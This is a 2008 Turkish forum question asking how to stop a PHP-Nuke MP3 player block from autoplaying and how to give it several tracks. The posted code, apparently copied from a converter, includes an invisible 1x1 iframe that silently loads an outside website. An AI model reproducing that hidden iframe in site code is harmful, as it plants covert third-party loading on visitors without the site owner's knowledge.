Tarih: 2008-05-21, 00:49:05 Mesaj konusu: Şu playerin otamatik çalmasını istemiyorum kod içerde..
Aşağıda verdiğim kod bir mp3 player kodu:
Bilen kardeşlerimden benim öğrenmek istediğim 2 şey var! Birincisi bu mp3 player sayfa açılır açılmaz çalıyor, ben bunun direk açılmasını istemiyorum. ikincisi; bu playere bir tane url adresi ekliyorum haliyle bir tane hep aynı parça çalıyor. Birden fazla nasıl ekleyebilirim? (not: Aslında bu html kodunu bir yerden buldum ben php-nuke ye çevirdim ama güzel bir şey..)
Kod:
<?php
// Save generated file in 'block' folder of PHP-Nuke root directory
// Note: The file name should begin with 'block-', e.g. 'block-YourBlockName.php'
if(eregi("block-YourBlockName.php",$_SERVER['PHP_SELF'])) {
header("Location: index.php");
}
// Generated by Easy HTML To Any Script Converter
$content.= "<embed style=\"FILTER: xray\" name=\"RAOCXplayer\" autoplay=\"true\" src=\"PARCANIN HTLM ADRESİ BURAYA GELECEK\" type=\"application/x-mplayer2\" ShowControls=\"1\" ShowStatusBar=\"0\" height=45px AutoSize=\"true\" loop=\"true\" EnableContextMenu=\"0\" pluginspage=\"http://www.microsoft.com/Windows/Downloads/Contents/Products/MediaPlayer/\"> </embed>\n";
$content.= " <i f r a m e name=\"I3\" src=\"www.koddunyasi.tr.gg\" width=\"1\" height=\"1\" scrolling=\"no\" border=\"0\" frameborder=\"0\"></i f r a m e>\n";
?>
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız